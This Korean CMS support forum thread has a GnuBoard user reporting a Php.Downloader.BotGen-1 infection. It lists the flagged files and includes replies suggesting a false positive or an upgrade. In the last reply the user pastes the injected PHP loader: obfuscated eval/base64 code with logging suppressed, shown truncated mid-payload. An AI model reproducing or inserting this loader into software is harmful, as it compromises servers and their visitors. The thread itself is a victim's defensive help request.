그누보드 QA - 파일 바이러스 감염

파일 바이러스 감염

JiniOh 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색

자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색

2020.01.22 15:09:35 조회 1875 (222.♡.♡.105)

본문

그누보드 5.3.3 버전을 해외 호스팅 업체의 서버에서 사용하고 있습니다.

실제 사용하려고 테스트 중이었는데 파일에 바이스러스(Php.Downloader.BotGen-1)가 감염되었다고 메일이 와서 확인해보니 정말 이상한 코드가 포함되어 있더군요. 해당 업체에 따르면 제사 사용하는 CMS가 보안이 취약하다고 하는데 어최신 버전은 이런 문제가 없는지요?

\adm\index.php: Php.Downloader.BotGen-1 FOUND
\adm\sms_admin\config.php: Php.Downloader.BotGen-1 FOUND
\config.php: Php.Downloader.BotGen-1 FOUND
\index.php: Php.Downloader.BotGen-1 FOUND
\install\index.php: Php.Downloader.BotGen-1 FOUND
\mobile\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\cheditor5\imageUpload\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\editor\smarteditor2\photo_uploader\popup\php\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sms5\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\facebook\tests\bootstrap.php: Php.Downloader.BotGen-1 FOUND
\plugin\sns\twitter\index.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\config.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\includes\functions.php: Php.Downloader.BotGen-1 FOUND
\plugin\social\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\index.php: Php.Downloader.BotGen-1 FOUND
\theme\basic\mobile\index.php: Php.Downloader.BotGen-1 FOUND

#그누보드5 #바이러스감염

답변 3

애드프로 홈페이지 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

2020-01-22 15:16:24 49.♡.♡.178

오진 같은데요?

어떤 코드가 보안에 취약한지 메일을 보내보세요.

그리고 해외 호스팅 사용시 언어셋 차이에 따른 바이러스 오진결과가 나오기도 합니다.

亞波治 홈페이지 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

2020-01-22 15:31:14 173.♡.♡.136

그누보드5.4 사용하시면 문제가 없을 겁니다.

해당 서버에 PHP Malware Scanner 를 이용해 점검을 한번 해 보세요.

https://www.phpclasses.org/package/11074-PHP-Scan-PHP-files-to-find-malicious-code.html

JiniOh 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

2020-01-22 15:34:45 222.♡.♡.105

실제로 파일을 열어 봤는데 아래와 같은 코드가 추가되어 있는 것을 볼수 있었습니다.

<?php @error_reporting(0); @ini_set('display_errors', 0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('error_reporting', 0); @ini_set('display_startup_errors', 0);function ToSJa1QEZFVIthfxHCBC6($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} function sdzwe5DAUwgcX6O3($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} function s2QrBZMfzhvwXWigD8YqSY($Is8og439q,$z9po05TQA,$MUMuhjXJL){return str_replace($Is8og439q,$z9po05TQA,$MUMuhjXJL);} $O9KBEcpT1Z4ll8O5EGqJ0Faj = 'bN2fAkLxkmYOoexg3ssfq6aaN2fAkLxkmYOoexg3ssfq6asN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6a6N2fAkLxkmYOoexg3ssfq6a4N2fAkLxkmYOoexg3ssfq6a_N2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6aeN2fAkLxkmYOoexg3ssfq6acN2fAkLxkmYOoexg3ssfq6aoN2fAkLxkmYOoexg3ssfq6adN2fAkLxkmYOoexg3ssfq6ae'; $O9KBEcpT1Z4ll8O5EGqJ0Faj = s2QrBZMfzhvwXWigD8YqSY('N2fAkLxkmYOoexg3ssfq6a','',$O9KBEcpT1Z4ll8O5EGqJ0Faj); $hVGidB9zilH = 'cXrutWuCIjuNKFprXrutWuCIjuNKFpeXrutWuCIjuNKFpaXrutWuCIjuNKFptXrutWuCIjuNKFpeXrutWuCIjuNKFp_XrutWuCIjuNKFpfXrutWuCIjuNKFpuXrutWuCIjuNKFpnXrutWuCIjuNKFpcXrutWuCIjuNKFptXrutWuCIjuNKFpiXrutWuCIjuNKFpoXrutWuCIjuNKFpn'; $hVGidB9zilH = s2QrBZMfzhvwXWigD8YqSY('XrutWuCIjuNKFp','',$hVGidB9zilH); $bkXytTxV7EX1jxCyKIC4u8 = 'rBVtQ0RXT9fYpcZaFgerBVtQ0RXT9fYpcZaFgvrBVtQ0RXT9fYpcZaFgarBVtQ0RXT9fYpcZaFgl'; $bkXytTxV7EX1jxCyKIC4u8 = s2QrBZMfzhvwXWigD8YqSY('rBVtQ0RXT9fYpcZaFg','',$bkXytTxV7EX1jxCyKIC4u8); $mAbXInuReFECY = '$dNOHi68Bnhc4OJKpng'; $BJltwdCTG1ufuoAsrYTsLs = $hVGidB9zilH($mAbXInuReFECY,$bkXytTxV7EX1jxCyKIC4u8.'('.$O9KBEcpT1Z4ll8O5EGqJ0Faj.'('.$mAbXInuReFECY.'));'); $BJltwdCTG1ufuoAsrYTsLs('ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBTVWpGYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVlZWa2MyUlhSbGRQV0hCaFYwWkdkbE5xU2xOalIwMTZVVzVPV2xkSGVHMVhiR2hMWlZkSmVsTnVjRXRsV0dSdVZGVk9jazR3VG5KUmJrSnBZbGQ0YlZsNlNsZE5SWFJFV2tkNGFtSnJjREpaTW5jMVl6SkplVmt5TlUxU1ZGWlhWa1ZXTTJORk9UTmpSVVpvVm5wV2QxZEVUazlpUjFKRVdqSTFhVko2YkhWWFJFcFhaVmRPZEU5WWJHcGxWMDU2VkZWT2NrNHdUbkpSYmtKcFlsZDRiVmw2U2xkTlJYUkVXa2Q0YW1KcmNESlpNbmMxWlZad1dWRnVXbXBpYkVwM1dXMHhhbUpyZUVSUldHUk1Wa2hPVEZWVlpITmtWMFpYVDFod1lWZEdSblpUYWtwVFkwZE5lbEZ1VGxwWFIzaHRXWHBPVTJGSFRuVlZha1pxVW1wc2Mxa3lOVXRrYlU1MVZGYzFUVkV3UmpOVE1WSjZVekpHV0ZkWE9VcFdNVzk0V1cweFQwMUhSbGhQV0ZaWlRXeFpNRmxXYUU5TlIwNDFXakkxWVdKWGVIcFhiRmsxWkRKU1dWVnRXbHBOYW13eFdrVmtWMlJYVWtsVVZ6Vk1WVEowYmxwWVpIWmFNR3hFVVZka1lXSnNXakZYVkU1VFkwZEplVTVIWkdGaVYzaDZWMnhaTldReVVsbFZiVnBhVFdwc01WcEZaRmRrVjFKSlZGYzVTMUl4Y0hkWmEyUlhXbTFLZEZKdVVtRlZNMlJ1VTJ0a1UyRkhVa2hTV0VKS1UwaE9URk5WVGtKYU1HeEVVVmRrU2xFd1JuSlhiV3hDVDFWc1NGZHVXbXBTTVZveFV6Qk9VMkpYUmxobFIzaFpUV3BXYjFsc1pGWmpNR3gxV1RKc1RGWklUa3hUVlU1Q1dqQnNSRkZYWkVwUk1FcDBXVEJvVjAxSFRqVmFNblJoWVZoa2NsZHJaRWROUm14VVlYcGtSR0ZWUm01VFZVNUNXakJzUkZGWFpHRmlWVFY2V1dwT1QySkZkRVJWYlRGTVZraE9URk5WVGtKYU1HeEpUVVYwYlZVd1JreFpWbVJhV2pCMFJGSnRNV3RXZWxaeFdrVmtjMlJ0U25OUFYzaHNVako0TmxwRmFFNWlNR3h5Vld4U1VsWlhVbkpYYlRGcldtdHNjR0V6UW14a00wSjBXa1pqTVdGdFVraGlTRnBwWVZWS1JsWlVRa2RUUm5CSVYyMDFXV1ZYWkhkYVdHUjJVMjFPZEZacVFtdFhSWEF4VTFWT1EwMUhUblZXYlhoUVpETkJOVkV5TVhOaVZXeEVXakpvWVdKc1dqRlhWRTVUWTBkSmVVNVhXbUZYUjJoM1dYcE9VMlZyZEVSVGExWldUVVZhU1ZkclpHRmliR2Q1VkcwNVlWWXdOWGxYUkU1UFkwWnZlVTVIYkV4Vk1uY3pVVEprYzJKWFVsaE9WM0JyVWpKNE1sbHRiRU5TVmxWM1VtdG9ZVkl4Y0hWWFJFcFBZakZ3V0ZSdVNsbE5NRFYzVjJwSk1HSXdjRWhWYldoclVqQldlbE5yYUU5alJtOTVUa2hDYkdReU9VdFJNVTVUWkRKU1dGTnVTbUZYUjNSdVZVWk9RbUpyZUZSTlNGSk5WWHBHUkZWc1ZtdFRiRkp3VVd4R1YxWlZjRTVWTVZaT1dqRk5kMVpzY0UxVmVrSXdWRVpOZDJKcmVIQlRiVTVwWVZWc01WTnFRWGhTTWxGNldrVldWbFp0ZUV4VmVrazFXVlpPV0dGRVNscE5SRlpEVmxaV1YxRXhSbk5TYTBwVFVtczBlbFZXYUd0V1JrWldZMFZPVWxaWVVrNVdSM0J6WVVkV2RXTkVSazFOYlhReVZUQmFjMDFzWkZoVVdFcE9VbFUxV1ZSc1ZsTldNa1pXV2tWd2ExWlZOVXhYVnpWMlltdDRjRk50VG1saFZXd3hVMjV3U21WdFRYbGtSbWhxVFZVMVZscEVTakJWUlRWMVdrWlNZVTFyVlhwV1ZsWjNWbXR6ZVUxSVpHRldNMmhEV1d0a00yVnRSbFphUmxaVFlYcHNWVlZ0TlhkWFZrVjVZVWM1YVZJelozaFdSRTVMVjBVMWNHUkdaRmRoTTJoYVYxZHdiMUpHUmxsYVJWcFNWbFZhVTFWR1VYZGlhM2h3VTIxT2FXRlZiREZUYm10M1pFVjRWRTFJVWxOV1ZGWkdVMVZhUTFac1JuSmxSWEJTWlZWS1RWVnNXbkprUlhoVVRVaFNUVlV5VFROUk1tUnlVMnR3U1ZGcVJscGlXR2gzVjFSRk5XTnNjRmxpUjFwcVlsWmFObE5WVVhkYU1rbDZVVzE0YVdKck5UWlphMWsxWW14d1dWVnRXbXBUUmxwd1dXdGtjMkZ0UlhsV2FsWk1VVEZLTTFwR1pFdGpiSEJaWVROQ1VHUXlPVXRSTVU1VFpXMUdXRnBJVmtwU1JFSnVWMWN4UjJWc2NGVlhWRUpaVFd4S2MxZFVTVFZoTVhCVVdqSjBhazF0ZUhWWmJXeHlUakJPYm1Fd2NFdFNlbXg1VTFWUmQxb3lTWHBSYlhocFltczFObGxyV1RWTmJIQlpVMjVDWVdKdGRIWlRhMlJUWVVkU1NGSllUa3BSTVVvMldWWmthMlJWZUVSUlYzUnFVMFphY0ZsclpITmhiR2Q1WkVkNGJGWnFiRFZYYkdoT1l6QnNSazlXUmxOV1ZGWlZWbFJDTkZwc1JsWmxSV2hWVFZSc1ZWVXdWa1psUlhSVll6QjBSRlZYZUhkWGJXeHVZVEpKZVdNeVpGRldSRUp1VkZaT2MwNHdUbTVoTUhCRVYwVndjMXBGYUZkbFYwcHdVV3BDYW1Kc1duTlVNMlIyVTJ0T1dVMUhaR0ZXTTJnMlYyeE9RMDR3VG01aE1IQkVWMFZ3YzFwRmFGZGxWMHB3VVcweFdsWXphRFpYYkZKNlV6Qk9VbUpFYkVSYU1uYzFVVEkwZDFNeVJsaFhWMlJNVVRCYWRGcEdZekZoYlZKSVlraGFhV0pFYkhOYVZXUnpaVzFTU1ZSWE9VcGhNVXBWVlZaV2EyRXhjSFJhUjFwWFRXcHNOVmxVUlRWaE1YQllWRzVhWVZJeFZuQlRNVTV6VGpCT2JtSkhNV3RXZWxaeFdrVmtjMlJ0U25CUmExWldUVVZhU1ZkclpHRmliR2Q0V2toYWFtSllVbTFYYTJSWFlXMUplVlZ0ZUV4Uk1VcFZXa1ZvUzJOSFNuUlpNMEpzWkRJNWJsTlZUa0phTUU1VVZXeFNhMU5GY0hkWmJURnFXakZDVkZGdGJGcFhSVFZ6Vkcxd1UxcHNjRWhXYlhCcFRXeEtjMU13VGxOV1IxSkpVMjVDYVd

답변을 작성하시기 전에 로그인 해주세요.

전체 0

로그인

파일 바이러스 감염

QA

파일 바이러스 감염

본문

이 질문에 댓글 쓰기 :

답변 3

애드프로 홈페이지 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

亞波治 홈페이지 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

JiniOh 자기소개 전체게시물 회원게시물 회원 질문검색 회원 답변검색 회원 댓글검색 님의 답변

회원로그인